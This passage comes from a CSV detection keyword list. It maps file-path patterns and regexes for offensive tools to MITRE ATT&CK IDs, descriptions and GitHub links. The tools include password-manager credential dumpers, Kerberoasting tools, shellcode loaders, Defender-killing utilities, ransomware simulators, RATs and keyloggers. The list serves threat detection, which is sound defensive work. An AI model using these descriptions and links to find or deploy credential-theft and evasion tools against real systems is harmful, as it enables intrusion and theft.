post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\IPfuscation.cpp*",".{0,1000}\\IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\IPfuscation.exe*",".{0,1000}\\IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple 
shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\ironvest\getCredsironvest.h*",".{0,1000}\\ironvest\\getCredsironvest\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\irs.exe*",".{0,1000}\\irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*\itsdangerous.zip*",".{0,1000}\\itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Ivy\Cryptor*",".{0,1000}\\Ivy\\Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\Ivy\Loader\*",".{0,1000}\\Ivy\\Loader\\.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jasmin Ransomware Final\*",".{0,1000}\\Jasmin\sRansomware\sFinal\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jormungand.sln*",".{0,1000}\\Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\JuicyPotatoNG*",".{0,1000}\\JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*\JunctionFolder.csproj*",".{0,1000}\\JunctionFolder\.csproj.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\kali-install.sh*",".{0,1000}\\kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*\kali-linux-2023*",".{0,1000}\\kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\kaspersky\getCredsKasperskyEntries.h*",".{0,1000}\\kaspersky\\getCredsKasperskyEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\KAssembly.x64.o*",".{0,1000}\\KAssembly\.x64\.o.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\katz.ps1*",".{0,1000}\\katz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\KaynInject.h*",".{0,1000}\\KaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynLdr\KaynInject\*",".{0,1000}\\KaynLdr\\KaynInject\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynLdr-main\*",".{0,1000}\\KaynLdr\-main\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynStrike.cna*",".{0,1000}\\KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry 
point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KaynStrike\src\*",".{0,1000}\\KaynStrike\\src\\.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KaynStrike-main*",".{0,1000}\\KaynStrike\-main.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KCMTicketFormatter*",".{0,1000}\\KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*\kdstab.exe*",".{0,1000}\\kdstab\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*\keepass_discover.py*",".{0,1000}\\keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\keepass_trigger.py*",".{0,1000}\\keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\keeper\getCredskeeper1.h*",".{0,1000}\\keeper\\getCredskeeper1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password 
managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\keeper\getCredskeeper2.h*",".{0,1000}\\keeper\\getCredskeeper2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\keeper\getCredskeeper3.h*",".{0,1000}\\keeper\\getCredskeeper3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\KeePwn.py*",".{0,1000}\\KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn\keepwn\*",".{0,1000}\\KeePwn\\keepwn\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn-0.3\*",".{0,1000}\\KeePwn\-0\.3\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn-main\*",".{0,1000}\\KeePwn\-main\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*\kekeo.exe*",".{0,1000}\\kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" 
"*\kerberoastables.txt*",".{0,1000}\\kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\kerberoasting.c*",".{0,1000}\\kerberoasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*\KerberOPSEC.cs*",".{0,1000}\\KerberOPSEC\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" 
"*\KerberOPSEC.sln*",".{0,1000}\\KerberOPSEC\.sln.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\Kerbeus-BOF\*",".{0,1000}\\Kerbeus\-BOF\\.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*\kerbrute.py*",".{0,1000}\\kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" 
"*\KernelTokens.sys*",".{0,1000}\\KernelTokens\.sys.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*\KExecDD-main*",".{0,1000}\\KExecDD\-main.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\keyLogger.cs*",".{0,1000}\\keyLogger\.cs.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\Keylogger.dll*",".{0,1000}\\Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Keylogger.ps1*",".{0,1000}\\Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Keylogger.txt*",".{0,1000}\\Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\KeyLoggerOffline.*",".{0,1000}\\KeyLoggerOffline\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\KidLogger\*",".{0,1000}\\KidLogger\\.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\KidLogger_is1*",".{0,1000}\\KidLogger_is1.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\KillDefender.c*",".{0,1000}\\KillDefender\.c.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC 
implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\KillDefender.o*",".{0,1000}\\KillDefender\.o.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\killer.cpp*",".{0,1000}\\killer\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\killer.exe*",".{0,1000}\\killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\KillWindows.dll*",".{0,1000}\\KillWindows\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - 